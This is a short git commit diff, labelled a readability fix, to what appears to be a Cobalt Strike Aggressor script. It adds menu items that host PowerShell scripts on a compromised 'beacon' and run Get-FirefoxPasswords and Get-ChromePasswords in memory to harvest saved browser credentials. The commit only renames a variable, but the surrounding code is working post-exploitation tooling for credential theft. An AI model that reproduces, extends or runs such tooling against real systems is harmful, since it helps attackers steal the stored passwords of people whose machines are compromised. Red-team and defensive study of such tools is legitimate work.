small readability fix

This commit is contained in:
Jonathan Echavarria
2016-07-14 14:23:14 -04:00
parent 60b83b1072
commit 33c1b3d316
+4 -4
View File
@@ -69,9 +69,9 @@ popup beacon_bottom{
closef($handle);
# host firefox script on beacon
$cmd = bhost_script($bid, $firefox_script);
binput($1, "powershell Get-FirefoxPasswords");
binput($bid, "powershell Get-FirefoxPasswords");
# execute in-memory hosted script
bpowershell($1, "$cmd");
bpowershell($bid, "$cmd");
}
}
item "Get Chrome Passwords"{
@@ -84,9 +84,9 @@ popup beacon_bottom{
closef($handle);
# host chrome script on beacon
$cmd = bhost_script($bid, $chrome_script);
binput($1, "powershell Get-ChromePasswords");
binput($bid, "powershell Get-ChromePasswords");
# execute in-memory hosted script
bpowershell($1, "$cmd");
bpowershell($bid, "$cmd");
}
}
}